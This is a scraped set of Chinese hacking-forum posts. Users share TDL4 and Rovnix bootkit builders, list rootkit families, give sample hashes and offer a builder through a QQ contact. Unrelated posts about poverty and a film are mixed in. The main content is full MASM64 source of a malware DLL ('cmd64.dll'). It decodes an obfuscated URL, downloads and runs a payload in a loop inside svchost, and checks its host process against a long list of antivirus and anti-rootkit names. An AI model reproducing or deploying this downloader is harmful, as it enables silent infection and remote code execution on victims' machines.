[Original] A newbie posting a small tool: a TDL4 builder
Built from samples from January 2012. TDL4 components: ph.dll phx.dll phln phlx phld phdx phd phdata phs. Recently I also wrote a builder for a VBR-infecting virus that supports 32-bit and 64-bit systems. It is called Rovnix.

[Help] TDL4 BK crashing on a real 64-bit Win7 machine
64-bit rootkits are found mainly abroad; I have not seen a domestic one. Win64/Olmarik (TDL4): infects the MBR, 32-bit/64-bit. Win64/Olmasco (MaxSS): infects the MBR/VBR and creates an active hidden partition, 32-bit/64-bit. Win64/Rovnix/Carberp: infects the VBR, 32-bit/64-bit. Win64/Sirefef (ZeroAccess): infects drivers and the MBR, 32-bit/64-bit. Win32/Gapz: infects the VBR, 32-bit/64-bit.

[Help] TDL4 BK crashing on a real 64-bit Win7 machine
XPAJ infects system files, so it gets discovered very easily. Not stealthy at all!

[Help] TDL4 BK crashing on a real 64-bit Win7 machine
Bro, are you into viruses? I have a fully reversed Rovnix (Cidox) and have already written a builder for it. If you want it, contact me, QQ: 958716364. Rovnix is far more powerful than TDL4.

[Help] TDL4 BK crashing on a real 64-bit Win7 machine
Give the two I reversed a try and see how they do; MaxSS even has virtual-machine detection! The TDL4 is the January 2012 sample.
SHA256: 9746b4f684b9d7d346ff131cd024e68d1b06e1b81571ce6d3c5067f0829d7932
SHA1: 6d07cf72201234a07ab57fb3fc00b9e5a0b3678e
MD5: a1b3e59ae17ba6f940afaf86485e5907
File size: 127.5 KB (130560 bytes)
File name: w.php.exe
File type: Win32 EXE
Sample write-ups: http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html (proxy needed) http://blog.eset.com/2012/02/02/tdl4-reloaded-purple-haze-all-in-my-brain

[Share] I want to earn a lot of money to help those poor old people whose plight is heartbreaking!
The power of an individual is far too small; it takes the government's effort. Some people feast and live in luxury, while others struggle even to eat; once they have no job and no source of income, all they can do is wait to die... This is China! The goal of Deng Xiaoping's reform and opening up was to narrow the gap between rich and poor and have the wealthy help the poor. But people nowadays are far too pragmatic...

[Original] A newbie posting a small tool: a TDL4 builder
The blue screen is perfectly normal; its purpose is to reboot the computer. TDL4 has already run successfully!

I am a 22-year-old temporary mine worker and want to learn assembly; no background, only finished middle school
Friend, as long as you have patience you will absolutely succeed! Let me tell you, I dropped out before even finishing primary school. Interest is the best teacher and the strongest motivation. As long as you love this field, nothing is a problem! Go for it!!!

[Share] "The Deal", a five-minute short film; when the girl says that line, can you hold back your tears?
I believe there are many things like this in the world! This cruel and heartless world! Why didn't the world end in 2012! I hate this heartless world!

[Original] A newbie posting a small tool: a TDL4 builder
蓝屏重启是正常现象。我保证绝对没有后门。我对灯发誓,如果有后门,立刻就没电。 includelib G:\RadASM\Masm64\SDK\Lib\kernel32.lib includelib G:\RadASM\Masm64\SDK\Lib\user32.lib includelib G:\RadASM\Masm64\SDK\Lib\urlmon.lib includelib G:\RadASM\Masm64\SDK\Lib\Shlwapi.lib EXTERN CreateThread :proc EXTERN DisableThreadLibraryCalls :proc EXTERN Sleep :proc EXTERN LoadLibraryA :proc ; EXTERN URLDownloadToFileA :proc EXTERN GetFileAttributesA :proc EXTERN WinExec :proc EXTERN GetTempPathA :proc EXTERN GetTempFileNameA :proc EXTERN GetModuleFileNameA :proc EXTERN GetProcAddress :proc ; EXTERN CreateMutexA :proc EXTERN CloseHandle :proc EXTERN DeleteFileA :proc EXTERN ExitProcess :proc EXTERN PathFindFileNameA :proc EXTERN GetCommandLineA :proc EXTERN StrStrIA :proc ; EXTERN MessageBoxA :proc EXTERN QueueUserWorkItem :proc EXTERN GetModuleHandleA :proc .data URL db "1111",0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 Urlmon db "Urlmon.dll",0 URLDown db "URLDownloadToFileA",0 stricmp db "_stricmp",0 ntdll db "ntdll.dll",0 netsvcs db "netsvcs",0 svchost db "svchost.exe",0 XueTr db "XueTr.exe",0 PowerTool db "PowerTool.exe",0 UfSeAgnt db "UfSeAgnt.exe",0 ;趋势 TMBMSRV db "TMBMSRV.exe",0 ;趋势 SfCtlCom db "SfCtlCom.exe",0 ;趋势 TmProxy db "TmProxy.exe",0 ;趋势 bdagent db "bdagent.exe",0 ;罗马尼亚反病毒软件 livesrv db "livesrv.exe",0 ;罗马尼亚杀毒软件在线升级程序 seccenter db "seccenter.exe",0 ;马尼亚反病毒软件 vsserv db "vsserv.exe",0 ;马尼亚反病毒软件 MPSVC db "MPSVC.exe",0 ;微点主动防御 MPSVC1 db "MPSVC1.exe",0 MPSVC2 db "MPSVC2.exe",0 MPMon db "MPMon.exe",0 ;微点主动防御 ast db "ast.exe",0 ;超级巡警 xiufu db "gmer.exe",0 avp db "avp.exe",0 ;卡巴斯基 egui db "egui.exe",0 ;Eset NOD32 ccSvcHst db "ccSvcHst.exe",0;诺顿 mcagent db "mcagent.exe",0 ;麦咖啡 mcmscsvc db "mcmscsvc.exe",0 McNASvc db "McNASvc.exe",0 Mcods db "Mcods.exe",0 McProxy db "McProxy.exe",0 Mcshield db "Mcshield.exe",0 mcsysmon db "mcsysmon.exe",0 mcvsshld db "mcvsshld.exe",0 MpfSrv db 
"MpfSrv.exe",0 McSACore db "McSACore.exe",0 msksrver db "msksrver.exe",0 sched db "sched.exe",0 ;小红伞 avguard db "avguard.exe",0 avmailc db "avmailc.exe",0 avwebgrd db "avwebgrd.exe",0 avgnt db "avgnt.exe",0 avcenter db "avcenter.exe",0 afwServ db "afwServ.exe",0 AvastUI db "AvastUI.exe",0 FilMsg db "FilMsg.exe",0;费尔 Twister db "Twister.exe",0 dwengine db "dwengine.exe",0;大蜘蛛 spidernt db "spidernt.exe",0;驱逐舰 spiderui db "spiderui.exe",0 spideragent db "spideragent.exe",0 SpIDerMl db "SpIDerMl.exe",0 avfwsvc db "avfwsvc.exe",0 avshadow db "avshadow.exe",0;小红伞 avgcsrvx db "avgcsrvx.exe",0;AVG avgemc db "avgemc.exe",0 avgnsx db "avgnsx.exe",0 avgrsx db "avgrsx.exe",0 avgtray db "avgtray.exe",0 avgwdsvc db "avgwdsvc.exe",0 Hstricmp QWORD 0 ;stricmp函数的地址 hInst QWORD 0 reason QWORD 0 reserved1 QWORD 0 .code Entry proc ;hInst:qword, reason:qword, reserved1:qword push rbp mov rbp,rsp mov hInst,rcx mov reason,rdx mov reserved1,r8 sub rsp,10h ; 按照参数个数分配堆栈 and spl,0F0H ;平衡堆栈 cmp reason,1 jnz @1 call kiil jmp @2 @1: mov rcx,hInst call DisableThreadLibraryCalls;禁止DLL_THREAD_ATTACH和DLL_THREAD_DETACH通知指定的动态链接库 push 1 pop rax @2: mov rsp,rbp pop rbp ret Entry Endp XIAZAI proc LOCAL _URL[80] :BYTE LOCAL lpHandles : QWORD LOCAL IpURLDown : QWORD LOCAL TempPath[260] :BYTE sub rsp,30h and spl,0F0H mov rcx,60000 call Sleep lea rcx,Urlmon call LoadLibraryA mov rcx,rax lea rdx,URLDown call GetProcAddress mov IpURLDown,rax lea rbx, URL lea rdx,_URL mov rcx,76 @w: mov r8b,[rbx] cmp r8b,0 jz @r xor r8b,15h mov [rdx],r8b inc rbx inc rdx loop @w @r: xor r8w,r8w mov [rdx],r8w @9: mov lpHandles ,0 mov rcx,260 lea rdx,TempPath call GetTempPathA lea rcx,TempPath xor rdx,rdx xor r8,r8 lea r9,TempPath call GetTempFileNameA @6: xor rcx,rcx lea rdx,_URL lea r8,TempPath xor r9,r9 mov [rsp+4*8],r9 call IpURLDown;下载文件 OR EAX,EAX jnz @3 lea rcx, TempPath call GetFileAttributesA ;检索文件属性 cmp EAX, -1 je @3 lea rcx, TempPath mov rdx,0 call WinExec ;运行文件 mov lpHandles ,1 mov rcx,60000 call Sleep lea 
rcx,TempPath call DeleteFileA @3: mov rcx,10000 call Sleep cmp lpHandles ,1 je @5 jmp @6 @5: mov rcx,3600000 call Sleep jmp @9 ret XIAZAI endp kiil proc LOCAL Gfilename [260] :BYTE LOCAL shuzu [54] :QWORD LOCAL Command :QWORD;命令行指针 LOCAL ssss :QWORD;文件名字指针 LOCAL pppp :QWORD;存放特征名字地址 sub rsp,30h and spl,0F0h mov rax,offset avgwdsvc mov shuzu ,rax mov rax,offset avgtray mov shuzu+1*8, rax mov rax,offset avgrsx mov shuzu+2*8, rax mov rax,offset avgnsx mov shuzu+3*8, rax mov rax,offset XueTr mov shuzu+4*8, rax mov rax,offset PowerTool mov shuzu+5*8, rax mov rax,offset UfSeAgnt mov shuzu+6*8, rax mov rax,offset TMBMSRV mov shuzu+7*8, rax mov rax,offset SfCtlCom mov shuzu+8*8, rax mov rax,offset TmProxy mov shuzu+9*8, rax mov rax,offset avshadow mov shuzu+10*8, rax mov rax,offset avgcsrvx mov shuzu+11*8, rax mov rax,offset avgemc mov shuzu+12*8, rax mov rax,offset bdagent mov shuzu+13*8, rax mov rax,offset livesrv mov shuzu+14*8, rax mov rax,offset seccenter mov shuzu+15*8, rax mov rax,offset vsserv mov shuzu+16*8, rax mov rax,offset MPSVC mov shuzu+17*8, rax mov rax,offset MPSVC1 mov shuzu+18*8, rax mov rax,offset MPSVC2 mov shuzu+19*8, rax mov rax,offset MPMon mov shuzu+20*8, rax mov rax,offset ast mov shuzu+21*8, rax mov rax,offset avfwsvc mov shuzu+22*8, rax mov rax,offset xiufu mov shuzu+23*8, rax mov rax,offset avp mov shuzu+24*8, rax mov rax,offset spidernt mov shuzu+25*8, rax mov rax,offset spiderui mov shuzu+26*8, rax mov rax,offset spideragent mov shuzu+27*8, rax mov rax,offset SpIDerMl mov shuzu+28*8, rax mov rax,offset Twister mov shuzu+29*8, rax mov rax,offset dwengine mov shuzu+30*8, rax mov rax,offset egui mov shuzu+31*8, rax mov rax,offset ccSvcHst mov shuzu+32*8, rax mov rax,offset mcagent mov shuzu+33*8, rax mov rax,offset mcmscsvc mov shuzu+34*8, rax mov rax,offset McNASvc mov shuzu+35*8, rax mov rax,offset Mcods mov shuzu+36*8, rax mov rax,offset McProxy mov shuzu+37*8, rax mov rax,offset Mcshield mov shuzu+38*8, rax mov rax,offset mcsysmon mov 
shuzu+39*8, rax mov rax,offset mcvsshld mov shuzu+40*8, rax mov rax,offset MpfSrv mov shuzu+41*8, rax mov rax,offset McSACore mov shuzu+42*8, rax mov rax,offset msksrver mov shuzu+43*8, rax mov rax,offset sched mov shuzu+44*8, rax mov rax,offset avguard mov shuzu+45*8, rax mov rax,offset avmailc mov shuzu+46*8, rax mov rax,offset avwebgrd mov shuzu+47*8, rax mov rax,offset avgnt mov shuzu+48*8, rax mov rax,offset avcenter mov shuzu+49*8, rax mov rax,offset afwServ mov shuzu+50*8, rax mov rax,offset AvastUI mov shuzu+51*8, rax mov rax,offset FilMsg mov shuzu+52*8, rax xor rax,rax mov shuzu+53*8,rax lea rcx,ntdll call GetModuleHandleA ;////////////////////////////////////////////////////////////////// mov rcx,rax lea rdx,stricmp call GetProcAddress mov Hstricmp,rax xor rcx,rcx lea rdx,Gfilename mov r8,260 call GetModuleFileNameA;获取文件路径 lea rcx,Gfilename call PathFindFileNameA ;获取文件名字 mov ssss ,rax call GetCommandLineA ;获取命令行 mov Command,rax lea rax,shuzu mov pppp,rax @4: mov rdx, ssss mov rax, pppp mov rcx,[rax] call Hstricmp cmp rax,0 jnz @3 xor rcx,rcx call ExitProcess @3: add pppp,8 mov rax,pppp cmp QWORD ptr [rax],0 jnz @4 lea rcx,svchost mov rdx, ssss call Hstricmp ;字符转比较 cmp rax,0 jnz @8 mov rcx,Command lea rdx,netsvcs call StrStrIA ;字符转搜索 test rax,rax je @8 xor rcx,rcx xor rdx,rdx lea r8,XIANCHENG xor r9,r9 mov [rsp+4*8],r9 mov [rsp+5*8],r9 call CreateThread;创建下载线程 mov rcx,rax call CloseHandle mov rax,1 jmp @s @8: xor rax,rax @s: ret kiil endp XIANCHENG proc push rbp mov rbp,rsp sub rsp,20h and spl,0F0h lea rcx,XIAZAI xor rdx,rdx mov r8,10h ;WT_EXECUTELONGFUNCTION call QueueUserWorkItem mov rsp,rbp pop rbp ret XIANCHENG endp END 这个是cmd64.dll的源代码 |
[Share] Reverse-engineered, cleaned-up and compiling version of the Ghost Shadow (鬼影) 3.0 code~
OP, you're amazing!